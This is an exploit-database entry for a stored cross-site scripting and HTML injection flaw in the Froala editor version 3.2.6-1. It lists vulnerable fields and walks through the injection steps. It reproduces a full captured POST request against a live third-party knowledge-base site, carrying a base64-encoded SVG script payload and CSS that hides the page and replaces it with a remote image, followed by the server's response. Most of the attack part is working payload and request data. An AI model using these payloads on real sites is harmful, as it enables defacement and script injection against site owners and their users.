Exploit for Froala 3.2.6-1 Cross Site Scripting

Name: Exploit for Froala 3.2.6-1 Cross Site Scripting
Rating: 5 (319 reviews)
2021-03-09 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:161702
# Exploit Title: Stored XSS and Html Code Injection Editor Froala  
# Version 3.2.6-1  
# Date:06.03.2021  
# Author: Vincent666 ibn Winnie  
# Software Link: https://froala.com/wysiwyg-editor/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ  
  
PoC:  
  
In the Froala I used xss code in base 64 and some tags for html code injection.  
  
  
Vuln Fields: Embed Url,Insert Link,Insert Files,Insert Video,etc.  
  
Example with Insert Files or Insert Image:  
  
Click browse files – choose file img from computer  
  
Insert on page , click on image and choose Insert Link and paste XSS code:  
  
And insert! We have stored xss + full html code Injection deface page.  
  
XSS Code:  
  
https://pastebin.com/jUUXQbzs  
  
Video with XSS and Html Code Injection:  
  
https://www.youtube.com/watch?v=QO2XiR8N1P0  
  
All fields with xss in base64 vulnerable to XSS. You can use method  
Get or Post.  
  
Encode your xss is here:  
  
https://www.base64encode.org/  
  
For Html Code Injection i use tags:  
  
Table,Div,span,style,body and another.  
  
Pictures:  
  
https://imgur.com/a/WIfQQw5  
https://imgur.com/a/P59ePrm  
https://imgur.com/a/Ksc5VWX  
  
Simple example on knowledgeowl.com: (They use Froala)  
  
Create new article and in editor choose and press "Code View":  
  
Paste xss code and again press "Code View" and save this.  
  
Example link : https://test345.knowledgeowl.com/help/asxdcfvgbvnm  
  
(Link works only 1 months)  
  
https://app.knowledgeowl.com/kb/article-edit-save  
  
Host: app.knowledgeowl.com  
  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)  
Gecko/20100101 Firefox/86.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: en-US;q=0.5,en;q=0.3  
  
Accept-Encoding: gzip, deflate, br  
  
Content-Type: multipart/form-data;  
boundary=---------------------------116499600342865829691384395973  
  
Content-Length: 4793  
  
Origin: https://app.knowledgeowl.com  
  
Connection: keep-alive  
  
Referer: https://app.knowledgeowl.com/kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f  
  
Cookie: (i delete this)  
  
Upgrade-Insecure-Requests: 1  
  
article-id=60464e9e8e121c1923587f5f&project_id=6043b120ec161c7539dea231&language=en&current_version=60464f2a8e121c172358807e&version=&category=&content_article=&linked_article=&dopen=1615238721&save-action=default&url_hash=asxdcfvgbvnm&title=asxdcfvgbvnm&toc_title=&internal_title=&art-redirect-url=&art-redirect-newtab=true&content=<p>""><embed  
src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxCjk0IiBoZWlnaHQ9IjIwMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCJJIGVuY29kZWQgeHNzIGluIGJhc2UgNjQuIEFic29sdXRlbHkgYWxsIGVkaXRvcnMgdnVsbmFyYWJsZSB0byB4c3MgYW5kIGh0bWwvaWZyYW1lIGNvZGUgaW5qZWN0aW9uIGFuZCB0aGlzIGlzIG5vdCBhIGJpZyBwcm9ibGVtLCBiZWNhdXNlIHRoaXMgaXMgY2FuIGZpeGVkLiBGaXggb24gZWRpdG9yIHNpZGUgYW5kIHlvdXIgc29mdHdhcmUuIFdoYXQgZWRpdG9ycyB0aGUgYmVzdD8gVGlueU1DRSwgRnJvYWxhIGFuZCBDa2VkaXRvciEiKTs8L3NjcmlwdD48L3N2Zz4KCgo="></p><style>body{visibility:hidden;}html{background:  
url(https://i.pinimg.com/originals/07/02/00/0702007f97e1804a8ca00fb36033e9ec.jpg)  
round;}</style>&meta_page_title=&meta_description=&status=published&date_published=&author=6043b10eec161c8d39dea36f&visibility=public&callout=none&callout_expire=03/15/2021&version_type=&custom-version=&version_note=&related-id[]=&application_screens=&csrf-token=af5366a45b186b5407fb55a1285b0f6ece862e25a46ebcfc070ab1d146b8b990  
  
POST: HTTP/1.1 302 Found  
  
Date: Mon, 08 Mar 2021 16:25:33 GMT  
  
Server: Apache  
  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
  
Pragma: no-cache  
  
Set-Cookie: _authbysession=90d12858ba2ea25a0ad42782; expires=Mon,  
08-Mar-2021 18:25:33 GMT; Max-Age=7200; path=/;  
domain=app.knowledgeowl.com; secure; httponly  
  
Location: /kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f  
  
Vary: Accept-Encoding  
  
Content-Encoding: gzip  
  
Content-Length: 21  
  
Content-Type: text/html; charset=UTF-8  
  
The final results in a simple form:  
  
We can use different fields in Froal's editor using cross site  
scripting and html/iframe code injection in base 64.